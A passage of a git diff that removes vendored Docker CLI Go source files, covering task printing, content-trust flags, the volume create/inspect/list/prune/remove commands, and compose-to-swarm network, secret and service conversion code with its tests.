64, - Status: "Template parsing error: " + err.Error()} - } - - APIVersion := dockerCli.Client().ClientVersion() - if defaultAPIVersion := dockerCli.DefaultVersion(); APIVersion != defaultAPIVersion { - APIVersion = fmt.Sprintf("%s (downgraded from %s)", APIVersion, defaultAPIVersion) - } - - vd := types.VersionResponse{ - Client: &types.Version{ - Version: dockerversion.Version, - APIVersion: APIVersion, - GoVersion: runtime.Version(), - GitCommit: dockerversion.GitCommit, - BuildTime: dockerversion.BuildTime, - Os: runtime.GOOS, - Arch: 
runtime.GOARCH, - }, - } - - serverVersion, err := dockerCli.Client().ServerVersion(ctx) - if err == nil { - vd.Server = &serverVersion - } - - // first we need to make BuildTime more human friendly - t, errTime := time.Parse(time.RFC3339Nano, vd.Client.BuildTime) - if errTime == nil { - vd.Client.BuildTime = t.Format(time.ANSIC) - } - - if vd.ServerOK() { - t, errTime = time.Parse(time.RFC3339Nano, vd.Server.BuildTime) - if errTime == nil { - vd.Server.BuildTime = t.Format(time.ANSIC) - } - } - - if err2 := tmpl.Execute(dockerCli.Out(), vd); err2 != nil && err == nil { - err = err2 - } - dockerCli.Out().Write([]byte{'\n'}) - return err -} diff --git a/vendor/github.com/docker/docker/cli/command/task/print.go b/vendor/github.com/docker/docker/cli/command/task/print.go deleted file mode 100644 index 0f1c2cf724..0000000000 --- a/vendor/github.com/docker/docker/cli/command/task/print.go +++ /dev/null @@ -1,161 +0,0 @@ -package task - -import ( - "fmt" - "io" - "sort" - "strings" - "text/tabwriter" - "time" - - "golang.org/x/net/context" - - distreference "github.com/docker/distribution/reference" - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/idresolver" - "github.com/docker/docker/pkg/stringid" - "github.com/docker/go-units" -) - -const ( - psTaskItemFmt = "%s\t%s\t%s\t%s\t%s\t%s %s ago\t%s\t%s\n" - maxErrLength = 30 -) - -type portStatus swarm.PortStatus - -func (ps portStatus) String() string { - if len(ps.Ports) == 0 { - return "" - } - - str := fmt.Sprintf("*:%d->%d/%s", ps.Ports[0].PublishedPort, ps.Ports[0].TargetPort, ps.Ports[0].Protocol) - for _, pConfig := range ps.Ports[1:] { - str += fmt.Sprintf(",*:%d->%d/%s", pConfig.PublishedPort, pConfig.TargetPort, pConfig.Protocol) - } - - return str -} - -type tasksBySlot []swarm.Task - -func (t tasksBySlot) Len() int { - return len(t) -} - -func (t tasksBySlot) Swap(i, j int) { - t[i], t[j] = t[j], t[i] -} - -func (t tasksBySlot) 
Less(i, j int) bool { - // Sort by slot. - if t[i].Slot != t[j].Slot { - return t[i].Slot < t[j].Slot - } - - // If same slot, sort by most recent. - return t[j].Meta.CreatedAt.Before(t[i].CreatedAt) -} - -// Print task information in a table format. -// Besides this, command `docker node ps ` -// and `docker stack ps` will call this, too. -func Print(dockerCli *command.DockerCli, ctx context.Context, tasks []swarm.Task, resolver *idresolver.IDResolver, noTrunc bool) error { - sort.Stable(tasksBySlot(tasks)) - - writer := tabwriter.NewWriter(dockerCli.Out(), 0, 4, 2, ' ', 0) - - // Ignore flushing errors - defer writer.Flush() - fmt.Fprintln(writer, strings.Join([]string{"ID", "NAME", "IMAGE", "NODE", "DESIRED STATE", "CURRENT STATE", "ERROR", "PORTS"}, "\t")) - - if err := print(writer, ctx, tasks, resolver, noTrunc); err != nil { - return err - } - - return nil -} - -// PrintQuiet shows task list in a quiet way. -func PrintQuiet(dockerCli *command.DockerCli, tasks []swarm.Task) error { - sort.Stable(tasksBySlot(tasks)) - - out := dockerCli.Out() - - for _, task := range tasks { - fmt.Fprintln(out, task.ID) - } - - return nil -} - -func print(out io.Writer, ctx context.Context, tasks []swarm.Task, resolver *idresolver.IDResolver, noTrunc bool) error { - prevName := "" - for _, task := range tasks { - id := task.ID - if !noTrunc { - id = stringid.TruncateID(id) - } - - serviceName, err := resolver.Resolve(ctx, swarm.Service{}, task.ServiceID) - if err != nil { - return err - } - - nodeValue, err := resolver.Resolve(ctx, swarm.Node{}, task.NodeID) - if err != nil { - return err - } - - name := "" - if task.Slot != 0 { - name = fmt.Sprintf("%v.%v", serviceName, task.Slot) - } else { - name = fmt.Sprintf("%v.%v", serviceName, task.NodeID) - } - - // Indent the name if necessary - indentedName := name - if name == prevName { - indentedName = fmt.Sprintf(" \\_ %s", indentedName) - } - prevName = name - - // Trim and quote the error message. 
- taskErr := task.Status.Err - if !noTrunc && len(taskErr) > maxErrLength { - taskErr = fmt.Sprintf("%s…", taskErr[:maxErrLength-1]) - } - if len(taskErr) > 0 { - taskErr = fmt.Sprintf("\"%s\"", taskErr) - } - - image := task.Spec.ContainerSpec.Image - if !noTrunc { - ref, err := distreference.ParseNamed(image) - if err == nil { - // update image string for display - namedTagged, ok := ref.(distreference.NamedTagged) - if ok { - image = namedTagged.Name() + ":" + namedTagged.Tag() - } - } - } - - fmt.Fprintf( - out, - psTaskItemFmt, - id, - indentedName, - image, - nodeValue, - command.PrettyPrint(task.DesiredState), - command.PrettyPrint(task.Status.State), - strings.ToLower(units.HumanDuration(time.Since(task.Status.Timestamp))), - taskErr, - portStatus(task.Status.PortStatus), - ) - } - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/trust.go b/vendor/github.com/docker/docker/cli/command/trust.go deleted file mode 100644 index b4c8a84ee5..0000000000 --- a/vendor/github.com/docker/docker/cli/command/trust.go +++ /dev/null @@ -1,39 +0,0 @@ -package command - -import ( - "os" - "strconv" - - "github.com/spf13/pflag" -) - -var ( - // TODO: make this not global - untrusted bool -) - -// AddTrustedFlags adds content trust flags to the current command flagset -func AddTrustedFlags(fs *pflag.FlagSet, verify bool) { - trusted, message := setupTrustedFlag(verify) - fs.BoolVar(&untrusted, "disable-content-trust", !trusted, message) -} - -func setupTrustedFlag(verify bool) (bool, string) { - var trusted bool - if e := os.Getenv("DOCKER_CONTENT_TRUST"); e != "" { - if t, err := strconv.ParseBool(e); t || err != nil { - // treat any other value as true - trusted = true - } - } - message := "Skip image signing" - if verify { - message = "Skip image verification" - } - return trusted, message -} - -// IsTrusted returns true if content trust is enabled -func IsTrusted() bool { - return !untrusted -} diff --git 
a/vendor/github.com/docker/docker/cli/command/utils.go b/vendor/github.com/docker/docker/cli/command/utils.go deleted file mode 100644 index 1837ca41f0..0000000000 --- a/vendor/github.com/docker/docker/cli/command/utils.go +++ /dev/null @@ -1,87 +0,0 @@ -package command - -import ( - "fmt" - "io" - "io/ioutil" - "os" - "path/filepath" - "runtime" - "strings" -) - -// CopyToFile writes the content of the reader to the specified file -func CopyToFile(outfile string, r io.Reader) error { - tmpFile, err := ioutil.TempFile(filepath.Dir(outfile), ".docker_temp_") - if err != nil { - return err - } - - tmpPath := tmpFile.Name() - - _, err = io.Copy(tmpFile, r) - tmpFile.Close() - - if err != nil { - os.Remove(tmpPath) - return err - } - - if err = os.Rename(tmpPath, outfile); err != nil { - os.Remove(tmpPath) - return err - } - - return nil -} - -// capitalizeFirst capitalizes the first character of string -func capitalizeFirst(s string) string { - switch l := len(s); l { - case 0: - return s - case 1: - return strings.ToLower(s) - default: - return strings.ToUpper(string(s[0])) + strings.ToLower(s[1:]) - } -} - -// PrettyPrint outputs arbitrary data for human formatted output by uppercasing the first letter. -func PrettyPrint(i interface{}) string { - switch t := i.(type) { - case nil: - return "None" - case string: - return capitalizeFirst(t) - default: - return capitalizeFirst(fmt.Sprintf("%s", t)) - } -} - -// PromptForConfirmation requests and checks confirmation from user. -// This will display the provided message followed by ' [y/N] '. If -// the user input 'y' or 'Y' it returns true other false. If no -// message is provided "Are you sure you want to proceed? [y/N] " -// will be used instead. -func PromptForConfirmation(ins *InStream, outs *OutStream, message string) bool { - if message == "" { - message = "Are you sure you want to proceed?" - } - message += " [y/N] " - - fmt.Fprintf(outs, message) - - // On Windows, force the use of the regular OS stdin stream. 
- if runtime.GOOS == "windows" { - ins = NewInStream(os.Stdin) - } - - answer := "" - n, _ := fmt.Fscan(ins, &answer) - if n != 1 || (answer != "y" && answer != "Y") { - return false - } - - return true -} diff --git a/vendor/github.com/docker/docker/cli/command/volume/cmd.go b/vendor/github.com/docker/docker/cli/command/volume/cmd.go deleted file mode 100644 index 40862f29d1..0000000000 --- a/vendor/github.com/docker/docker/cli/command/volume/cmd.go +++ /dev/null @@ -1,45 +0,0 @@ -package volume - -import ( - "github.com/spf13/cobra" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" -) - -// NewVolumeCommand returns a cobra command for `volume` subcommands -func NewVolumeCommand(dockerCli *command.DockerCli) *cobra.Command { - cmd := &cobra.Command{ - Use: "volume COMMAND", - Short: "Manage volumes", - Long: volumeDescription, - Args: cli.NoArgs, - RunE: dockerCli.ShowHelp, - } - cmd.AddCommand( - newCreateCommand(dockerCli), - newInspectCommand(dockerCli), - newListCommand(dockerCli), - newRemoveCommand(dockerCli), - NewPruneCommand(dockerCli), - ) - return cmd -} - -var volumeDescription = ` -The **docker volume** command has subcommands for managing data volumes. A data -volume is a specially-designated directory that by-passes storage driver -management. - -Data volumes persist data independent of a container's life cycle. When you -delete a container, the Docker daemon does not delete any data volumes. You can -share volumes across multiple containers. Moreover, you can share data volumes -with other computing resources in your system. - -To see help for a subcommand, use: - - docker volume COMMAND --help - -For full details on using docker volume visit Docker's online documentation. 
- -` diff --git a/vendor/github.com/docker/docker/cli/command/volume/create.go b/vendor/github.com/docker/docker/cli/command/volume/create.go deleted file mode 100644 index 7b2a7e3318..0000000000 --- a/vendor/github.com/docker/docker/cli/command/volume/create.go +++ /dev/null @@ -1,111 +0,0 @@ -package volume - -import ( - "fmt" - - "golang.org/x/net/context" - - volumetypes "github.com/docker/docker/api/types/volume" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/opts" - runconfigopts "github.com/docker/docker/runconfig/opts" - "github.com/spf13/cobra" -) - -type createOptions struct { - name string - driver string - driverOpts opts.MapOpts - labels opts.ListOpts -} - -func newCreateCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := createOptions{ - driverOpts: *opts.NewMapOpts(nil, nil), - labels: opts.NewListOpts(runconfigopts.ValidateEnv), - } - - cmd := &cobra.Command{ - Use: "create [OPTIONS] [VOLUME]", - Short: "Create a volume", - Long: createDescription, - Args: cli.RequiresMaxArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - if len(args) == 1 { - if opts.name != "" { - fmt.Fprint(dockerCli.Err(), "Conflicting options: either specify --name or provide positional arg, not both\n") - return cli.StatusError{StatusCode: 1} - } - opts.name = args[0] - } - return runCreate(dockerCli, opts) - }, - } - flags := cmd.Flags() - flags.StringVarP(&opts.driver, "driver", "d", "local", "Specify volume driver name") - flags.StringVar(&opts.name, "name", "", "Specify volume name") - flags.Lookup("name").Hidden = true - flags.VarP(&opts.driverOpts, "opt", "o", "Set driver specific options") - flags.Var(&opts.labels, "label", "Set metadata for a volume") - - return cmd -} - -func runCreate(dockerCli *command.DockerCli, opts createOptions) error { - client := dockerCli.Client() - - volReq := volumetypes.VolumesCreateBody{ - Driver: opts.driver, - DriverOpts: opts.driverOpts.GetAll(), - Name: 
opts.name, - Labels: runconfigopts.ConvertKVStringsToMap(opts.labels.GetAll()), - } - - vol, err := client.VolumeCreate(context.Background(), volReq) - if err != nil { - return err - } - - fmt.Fprintf(dockerCli.Out(), "%s\n", vol.Name) - return nil -} - -var createDescription = ` -Creates a new volume that containers can consume and store data in. If a name -is not specified, Docker generates a random name. You create a volume and then -configure the container to use it, for example: - - $ docker volume create hello - hello - $ docker run -d -v hello:/world busybox ls /world - -The mount is created inside the container's **/src** directory. Docker doesn't -not support relative paths for mount points inside the container. - -Multiple containers can use the same volume in the same time period. This is -useful if two containers need access to shared data. For example, if one -container writes and the other reads the data. - -## Driver specific options - -Some volume drivers may take options to customize the volume creation. Use the -**-o** or **--opt** flags to pass driver options: - - $ docker volume create --driver fake --opt tardis=blue --opt timey=wimey - -These options are passed directly to the volume driver. Options for different -volume drivers may do different things (or nothing at all). - -The built-in **local** driver on Windows does not support any options. 
- -The built-in **local** driver on Linux accepts options similar to the linux -**mount** command: - - $ docker volume create --driver local --opt type=tmpfs --opt device=tmpfs --opt o=size=100m,uid=1000 - -Another example: - - $ docker volume create --driver local --opt type=btrfs --opt device=/dev/sda2 - -` diff --git a/vendor/github.com/docker/docker/cli/command/volume/inspect.go b/vendor/github.com/docker/docker/cli/command/volume/inspect.go deleted file mode 100644 index 5eb8ad2516..0000000000 --- a/vendor/github.com/docker/docker/cli/command/volume/inspect.go +++ /dev/null @@ -1,55 +0,0 @@ -package volume - -import ( - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/inspect" - "github.com/spf13/cobra" -) - -type inspectOptions struct { - format string - names []string -} - -func newInspectCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts inspectOptions - - cmd := &cobra.Command{ - Use: "inspect [OPTIONS] VOLUME [VOLUME...]", - Short: "Display detailed information on one or more volumes", - Long: inspectDescription, - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.names = args - return runInspect(dockerCli, opts) - }, - } - - cmd.Flags().StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template") - - return cmd -} - -func runInspect(dockerCli *command.DockerCli, opts inspectOptions) error { - client := dockerCli.Client() - - ctx := context.Background() - - getVolFunc := func(name string) (interface{}, []byte, error) { - i, err := client.VolumeInspect(ctx, name) - return i, nil, err - } - - return inspect.Inspect(dockerCli.Out(), opts.names, opts.format, getVolFunc) -} - -var inspectDescription = ` -Returns information about one or more volumes. By default, this command renders -all results in a JSON array. 
You can specify an alternate format to execute a -given template is executed for each result. Go's https://golang.org/pkg/text/template/ -package describes all the details of the format. - -` diff --git a/vendor/github.com/docker/docker/cli/command/volume/list.go b/vendor/github.com/docker/docker/cli/command/volume/list.go deleted file mode 100644 index d76006a1b2..0000000000 --- a/vendor/github.com/docker/docker/cli/command/volume/list.go +++ /dev/null @@ -1,91 +0,0 @@ -package volume - -import ( - "sort" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/formatter" - "github.com/docker/docker/opts" - "github.com/spf13/cobra" -) - -type byVolumeName []*types.Volume - -func (r byVolumeName) Len() int { return len(r) } -func (r byVolumeName) Swap(i, j int) { r[i], r[j] = r[j], r[i] } -func (r byVolumeName) Less(i, j int) bool { - return r[i].Name < r[j].Name -} - -type listOptions struct { - quiet bool - format string - filter opts.FilterOpt -} - -func newListCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := listOptions{filter: opts.NewFilterOpt()} - - cmd := &cobra.Command{ - Use: "ls [OPTIONS]", - Aliases: []string{"list"}, - Short: "List volumes", - Long: listDescription, - Args: cli.NoArgs, - RunE: func(cmd *cobra.Command, args []string) error { - return runList(dockerCli, opts) - }, - } - - flags := cmd.Flags() - flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display volume names") - flags.StringVar(&opts.format, "format", "", "Pretty-print volumes using a Go template") - flags.VarP(&opts.filter, "filter", "f", "Provide filter values (e.g. 
'dangling=true')") - - return cmd -} - -func runList(dockerCli *command.DockerCli, opts listOptions) error { - client := dockerCli.Client() - volumes, err := client.VolumeList(context.Background(), opts.filter.Value()) - if err != nil { - return err - } - - format := opts.format - if len(format) == 0 { - if len(dockerCli.ConfigFile().VolumesFormat) > 0 && !opts.quiet { - format = dockerCli.ConfigFile().VolumesFormat - } else { - format = formatter.TableFormatKey - } - } - - sort.Sort(byVolumeName(volumes.Volumes)) - - volumeCtx := formatter.Context{ - Output: dockerCli.Out(), - Format: formatter.NewVolumeFormat(format, opts.quiet), - } - return formatter.VolumeWrite(volumeCtx, volumes.Volumes) -} - -var listDescription = ` - -Lists all the volumes Docker manages. You can filter using the **-f** or -**--filter** flag. The filtering format is a **key=value** pair. To specify -more than one filter, pass multiple flags (for example, -**--filter "foo=bar" --filter "bif=baz"**) - -The currently supported filters are: - -* **dangling** (boolean - **true** or **false**, **1** or **0**) -* **driver** (a volume driver's name) -* **label** (**label=** or **label==**) -* **name** (a volume's name) - -` diff --git a/vendor/github.com/docker/docker/cli/command/volume/prune.go b/vendor/github.com/docker/docker/cli/command/volume/prune.go deleted file mode 100644 index 405fbeb295..0000000000 --- a/vendor/github.com/docker/docker/cli/command/volume/prune.go +++ /dev/null @@ -1,75 +0,0 @@ -package volume - -import ( - "fmt" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types/filters" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - units "github.com/docker/go-units" - "github.com/spf13/cobra" -) - -type pruneOptions struct { - force bool -} - -// NewPruneCommand returns a new cobra prune command for volumes -func NewPruneCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts pruneOptions - - cmd := &cobra.Command{ - Use: 
"prune [OPTIONS]", - Short: "Remove all unused volumes", - Args: cli.NoArgs, - RunE: func(cmd *cobra.Command, args []string) error { - spaceReclaimed, output, err := runPrune(dockerCli, opts) - if err != nil { - return err - } - if output != "" { - fmt.Fprintln(dockerCli.Out(), output) - } - fmt.Fprintln(dockerCli.Out(), "Total reclaimed space:", units.HumanSize(float64(spaceReclaimed))) - return nil - }, - Tags: map[string]string{"version": "1.25"}, - } - - flags := cmd.Flags() - flags.BoolVarP(&opts.force, "force", "f", false, "Do not prompt for confirmation") - - return cmd -} - -const warning = `WARNING! This will remove all volumes not used by at least one container. -Are you sure you want to continue?` - -func runPrune(dockerCli *command.DockerCli, opts pruneOptions) (spaceReclaimed uint64, output string, err error) { - if !opts.force && !command.PromptForConfirmation(dockerCli.In(), dockerCli.Out(), warning) { - return - } - - report, err := dockerCli.Client().VolumesPrune(context.Background(), filters.Args{}) - if err != nil { - return - } - - if len(report.VolumesDeleted) > 0 { - output = "Deleted Volumes:\n" - for _, id := range report.VolumesDeleted { - output += id + "\n" - } - spaceReclaimed = report.SpaceReclaimed - } - - return -} - -// RunPrune calls the Volume Prune API -// This returns the amount of space reclaimed and a detailed output string -func RunPrune(dockerCli *command.DockerCli) (uint64, string, error) { - return runPrune(dockerCli, pruneOptions{force: true}) -} diff --git a/vendor/github.com/docker/docker/cli/command/volume/remove.go b/vendor/github.com/docker/docker/cli/command/volume/remove.go deleted file mode 100644 index f464bb3e1a..0000000000 --- a/vendor/github.com/docker/docker/cli/command/volume/remove.go +++ /dev/null @@ -1,68 +0,0 @@ -package volume - -import ( - "fmt" - - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -type removeOptions 
struct { - force bool - - volumes []string -} - -func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts removeOptions - - cmd := &cobra.Command{ - Use: "rm [OPTIONS] VOLUME [VOLUME...]", - Aliases: []string{"remove"}, - Short: "Remove one or more volumes", - Long: removeDescription, - Example: removeExample, - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.volumes = args - return runRemove(dockerCli, &opts) - }, - } - - flags := cmd.Flags() - flags.BoolVarP(&opts.force, "force", "f", false, "Force the removal of one or more volumes") - flags.SetAnnotation("force", "version", []string{"1.25"}) - return cmd -} - -func runRemove(dockerCli *command.DockerCli, opts *removeOptions) error { - client := dockerCli.Client() - ctx := context.Background() - status := 0 - - for _, name := range opts.volumes { - if err := client.VolumeRemove(ctx, name, opts.force); err != nil { - fmt.Fprintf(dockerCli.Err(), "%s\n", err) - status = 1 - continue - } - fmt.Fprintf(dockerCli.Out(), "%s\n", name) - } - - if status != 0 { - return cli.StatusError{StatusCode: status} - } - return nil -} - -var removeDescription = ` -Remove one or more volumes. You cannot remove a volume that is in use by a container. 
-` - -var removeExample = ` -$ docker volume rm hello -hello -` diff --git a/vendor/github.com/docker/docker/cli/compose/convert/compose.go b/vendor/github.com/docker/docker/cli/compose/convert/compose.go deleted file mode 100644 index 8122326aa5..0000000000 --- a/vendor/github.com/docker/docker/cli/compose/convert/compose.go +++ /dev/null @@ -1,116 +0,0 @@ -package convert - -import ( - "io/ioutil" - - "github.com/docker/docker/api/types" - networktypes "github.com/docker/docker/api/types/network" - "github.com/docker/docker/api/types/swarm" - composetypes "github.com/docker/docker/cli/compose/types" -) - -const ( - // LabelNamespace is the label used to track stack resources - LabelNamespace = "com.docker.stack.namespace" -) - -// Namespace mangles names by prepending the name -type Namespace struct { - name string -} - -// Scope prepends the namespace to a name -func (n Namespace) Scope(name string) string { - return n.name + "_" + name -} - -// Name returns the name of the namespace -func (n Namespace) Name() string { - return n.name -} - -// NewNamespace returns a new Namespace for scoping of names -func NewNamespace(name string) Namespace { - return Namespace{name: name} -} - -// AddStackLabel returns labels with the namespace label added -func AddStackLabel(namespace Namespace, labels map[string]string) map[string]string { - if labels == nil { - labels = make(map[string]string) - } - labels[LabelNamespace] = namespace.name - return labels -} - -type networkMap map[string]composetypes.NetworkConfig - -// Networks converts networks from the compose-file type to the engine API type -func Networks( - namespace Namespace, - networks networkMap, - servicesNetworks map[string]struct{}, -) (map[string]types.NetworkCreate, []string) { - if networks == nil { - networks = make(map[string]composetypes.NetworkConfig) - } - - externalNetworks := []string{} - result := make(map[string]types.NetworkCreate) - - for internalName := range servicesNetworks { - network := 
networks[internalName] - if network.External.External { - externalNetworks = append(externalNetworks, network.External.Name) - continue - } - - createOpts := types.NetworkCreate{ - Labels: AddStackLabel(namespace, network.Labels), - Driver: network.Driver, - Options: network.DriverOpts, - Internal: network.Internal, - } - - if network.Ipam.Driver != "" || len(network.Ipam.Config) > 0 { - createOpts.IPAM = &networktypes.IPAM{} - } - - if network.Ipam.Driver != "" { - createOpts.IPAM.Driver = network.Ipam.Driver - } - for _, ipamConfig := range network.Ipam.Config { - config := networktypes.IPAMConfig{ - Subnet: ipamConfig.Subnet, - } - createOpts.IPAM.Config = append(createOpts.IPAM.Config, config) - } - result[internalName] = createOpts - } - - return result, externalNetworks -} - -// Secrets converts secrets from the Compose type to the engine API type -func Secrets(namespace Namespace, secrets map[string]composetypes.SecretConfig) ([]swarm.SecretSpec, error) { - result := []swarm.SecretSpec{} - for name, secret := range secrets { - if secret.External.External { - continue - } - - data, err := ioutil.ReadFile(secret.File) - if err != nil { - return nil, err - } - - result = append(result, swarm.SecretSpec{ - Annotations: swarm.Annotations{ - Name: namespace.Scope(name), - Labels: AddStackLabel(namespace, secret.Labels), - }, - Data: data, - }) - } - return result, nil -} diff --git a/vendor/github.com/docker/docker/cli/compose/convert/compose_test.go b/vendor/github.com/docker/docker/cli/compose/convert/compose_test.go deleted file mode 100644 index f333d73fda..0000000000 --- a/vendor/github.com/docker/docker/cli/compose/convert/compose_test.go +++ /dev/null @@ -1,122 +0,0 @@ -package convert - -import ( - "testing" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/network" - composetypes "github.com/docker/docker/cli/compose/types" - "github.com/docker/docker/pkg/testutil/assert" - "github.com/docker/docker/pkg/testutil/tempfile" -) - 
-func TestNamespaceScope(t *testing.T) { - scoped := Namespace{name: "foo"}.Scope("bar") - assert.Equal(t, scoped, "foo_bar") -} - -func TestAddStackLabel(t *testing.T) { - labels := map[string]string{ - "something": "labeled", - } - actual := AddStackLabel(Namespace{name: "foo"}, labels) - expected := map[string]string{ - "something": "labeled", - LabelNamespace: "foo", - } - assert.DeepEqual(t, actual, expected) -} - -func TestNetworks(t *testing.T) { - namespace := Namespace{name: "foo"} - source := networkMap{ - "normal": composetypes.NetworkConfig{ - Driver: "overlay", - DriverOpts: map[string]string{ - "opt": "value", - }, - Ipam: composetypes.IPAMConfig{ - Driver: "driver", - Config: []*composetypes.IPAMPool{ - { - Subnet: "10.0.0.0", - }, - }, - }, - Labels: map[string]string{ - "something": "labeled", - }, - }, - "outside": composetypes.NetworkConfig{ - External: composetypes.External{ - External: true, - Name: "special", - }, - }, - } - expected := map[string]types.NetworkCreate{ - "default": { - Labels: map[string]string{ - LabelNamespace: "foo", - }, - }, - "normal": { - Driver: "overlay", - IPAM: &network.IPAM{ - Driver: "driver", - Config: []network.IPAMConfig{ - { - Subnet: "10.0.0.0", - }, - }, - }, - Options: map[string]string{ - "opt": "value", - }, - Labels: map[string]string{ - LabelNamespace: "foo", - "something": "labeled", - }, - }, - } - - serviceNetworks := map[string]struct{}{ - "default": {}, - "normal": {}, - "outside": {}, - } - networks, externals := Networks(namespace, source, serviceNetworks) - assert.DeepEqual(t, networks, expected) - assert.DeepEqual(t, externals, []string{"special"}) -} - -func TestSecrets(t *testing.T) { - namespace := Namespace{name: "foo"} - - secretText := "this is the first secret" - secretFile := tempfile.NewTempFile(t, "convert-secrets", secretText) - defer secretFile.Remove() - - source := map[string]composetypes.SecretConfig{ - "one": { - File: secretFile.Name(), - Labels: map[string]string{"monster": 
"mash"}, - }, - "ext": { - External: composetypes.External{ - External: true, - }, - }, - } - - specs, err := Secrets(namespace, source) - assert.NilError(t, err) - assert.Equal(t, len(specs), 1) - secret := specs[0] - assert.Equal(t, secret.Name, "foo_one") - assert.DeepEqual(t, secret.Labels, map[string]string{ - "monster": "mash", - LabelNamespace: "foo", - }) - assert.DeepEqual(t, secret.Data, []byte(secretText)) -} diff --git a/vendor/github.com/docker/docker/cli/compose/convert/service.go b/vendor/github.com/docker/docker/cli/compose/convert/service.go deleted file mode 100644 index 4a5489562c..0000000000 --- a/vendor/github.com/docker/docker/cli/compose/convert/service.go +++ /dev/null @@ -1,416 +0,0 @@ -package convert - -import ( - "fmt" - "os" - "sort" - "time" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/container" - "github.com/docker/docker/api/types/swarm" - servicecli "github.com/docker/docker/cli/command/service" - composetypes "github.com/docker/docker/cli/compose/types" - "github.com/docker/docker/client" - "github.com/docker/docker/opts" - runconfigopts "github.com/docker/docker/runconfig/opts" - "github.com/docker/go-connections/nat" -) - -// Services from compose-file types to engine API types -// TODO: fix secrets API so that SecretAPIClient is not required here -func Services( - namespace Namespace, - config *composetypes.Config, - client client.SecretAPIClient, -) (map[string]swarm.ServiceSpec, error) { - result := make(map[string]swarm.ServiceSpec) - - services := config.Services - volumes := config.Volumes - networks := config.Networks - - for _, service := range services { - - secrets, err := convertServiceSecrets(client, namespace, service.Secrets, config.Secrets) - if err != nil { - return nil, err - } - serviceSpec, err := convertService(namespace, service, networks, volumes, secrets) - if err != nil { - return nil, err - } - result[service.Name] = serviceSpec - } - - return result, nil -} - -func 
convertService( - namespace Namespace, - service composetypes.ServiceConfig, - networkConfigs map[string]composetypes.NetworkConfig, - volumes map[string]composetypes.VolumeConfig, - secrets []*swarm.SecretReference, -) (swarm.ServiceSpec, error) { - name := namespace.Scope(service.Name) - - endpoint, err := convertEndpointSpec(service.Ports) - if err != nil { - return swarm.ServiceSpec{}, err - } - - mode, err := convertDeployMode(service.Deploy.Mode, service.Deploy.Replicas) - if err != nil { - return swarm.ServiceSpec{}, err - } - - mounts, err := Volumes(service.Volumes, volumes, namespace) - if err != nil { - // TODO: better error message (include service name) - return swarm.ServiceSpec{}, err - } - - resources, err := convertResources(service.Deploy.Resources) - if err != nil { - return swarm.ServiceSpec{}, err - } - - restartPolicy, err := convertRestartPolicy( - service.Restart, service.Deploy.RestartPolicy) - if err != nil { - return swarm.ServiceSpec{}, err - } - - healthcheck, err := convertHealthcheck(service.HealthCheck) - if err != nil { - return swarm.ServiceSpec{}, err - } - - networks, err := convertServiceNetworks(service.Networks, networkConfigs, namespace, service.Name) - if err != nil { - return swarm.ServiceSpec{}, err - } - - var logDriver *swarm.Driver - if service.Logging != nil { - logDriver = &swarm.Driver{ - Name: service.Logging.Driver, - Options: service.Logging.Options, - } - } - - serviceSpec := swarm.ServiceSpec{ - Annotations: swarm.Annotations{ - Name: name, - Labels: AddStackLabel(namespace, service.Deploy.Labels), - }, - TaskTemplate: swarm.TaskSpec{ - ContainerSpec: swarm.ContainerSpec{ - Image: service.Image, - Command: service.Entrypoint, - Args: service.Command, - Hostname: service.Hostname, - Hosts: sortStrings(convertExtraHosts(service.ExtraHosts)), - Healthcheck: healthcheck, - Env: sortStrings(convertEnvironment(service.Environment)), - Labels: AddStackLabel(namespace, service.Labels), - Dir: service.WorkingDir, - User: 
service.User, - Mounts: mounts, - StopGracePeriod: service.StopGracePeriod, - TTY: service.Tty, - OpenStdin: service.StdinOpen, - Secrets: secrets, - }, - LogDriver: logDriver, - Resources: resources, - RestartPolicy: restartPolicy, - Placement: &swarm.Placement{ - Constraints: service.Deploy.Placement.Constraints, - }, - }, - EndpointSpec: endpoint, - Mode: mode, - Networks: networks, - UpdateConfig: convertUpdateConfig(service.Deploy.UpdateConfig), - } - - return serviceSpec, nil -} - -func sortStrings(strs []string) []string { - sort.Strings(strs) - return strs -} - -type byNetworkTarget []swarm.NetworkAttachmentConfig - -func (a byNetworkTarget) Len() int { return len(a) } -func (a byNetworkTarget) Swap(i, j int) { a[i], a[j] = a[j], a[i] } -func (a byNetworkTarget) Less(i, j int) bool { return a[i].Target < a[j].Target } - -func convertServiceNetworks( - networks map[string]*composetypes.ServiceNetworkConfig, - networkConfigs networkMap, - namespace Namespace, - name string, -) ([]swarm.NetworkAttachmentConfig, error) { - if len(networks) == 0 { - return []swarm.NetworkAttachmentConfig{ - { - Target: namespace.Scope("default"), - Aliases: []string{name}, - }, - }, nil - } - - nets := []swarm.NetworkAttachmentConfig{} - for networkName, network := range networks { - networkConfig, ok := networkConfigs[networkName] - if !ok { - return []swarm.NetworkAttachmentConfig{}, fmt.Errorf( - "service %q references network %q, which is not declared", name, networkName) - } - var aliases []string - if network != nil { - aliases = network.Aliases - } - target := namespace.Scope(networkName) - if networkConfig.External.External { - target = networkConfig.External.Name - } - nets = 